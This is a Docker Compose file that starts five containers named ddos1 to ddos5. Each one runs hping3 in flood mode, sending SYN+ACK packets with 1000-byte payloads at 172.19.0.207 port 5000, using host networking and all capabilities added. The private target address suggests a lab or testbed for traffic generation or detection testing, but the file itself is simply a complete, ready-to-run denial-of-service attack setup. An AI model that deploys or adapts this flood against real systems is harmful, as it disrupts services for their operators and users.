version: "3"
services: 
    ddos1:
        image: sflow/hping3:latest
        network_mode: host
        stdin_open: true
        tty: true
        entrypoint: ["hping3", "172.19.0.207", "-p", "5000", "-S", "-A", "--flood", "-d", "1000"]
        cap_add:
        - ALL
    ddos2:
        image: sflow/hping3:latest
        network_mode: host
        stdin_open: true
        tty: true
        entrypoint: ["hping3", "172.19.0.207", "-p", "5000", "-S", "-A", "--flood", "-d", "1000"]
        cap_add:
        - ALL
    ddos3:
        image: sflow/hping3:latest
        network_mode: host
        stdin_open: true
        tty: true
        entrypoint: ["hping3", "172.19.0.207", "-p", "5000", "-S", "-A", "--flood", "-d", "1000"]
        cap_add:
        - ALL
    ddos4:
        image: sflow/hping3:latest
        network_mode: host
        stdin_open: true
        tty: true
        entrypoint: ["hping3", "172.19.0.207", "-p", "5000", "-S", "-A", "--flood", "-d", "1000"]
        cap_add:
        - ALL
    ddos5:
        image: sflow/hping3:latest
        network_mode: host
        stdin_open: true
        tty: true
        entrypoint: ["hping3", "172.19.0.207", "-p", "5000", "-S", "-A", "--flood", "-d", "1000"]
        cap_add:
        - ALL
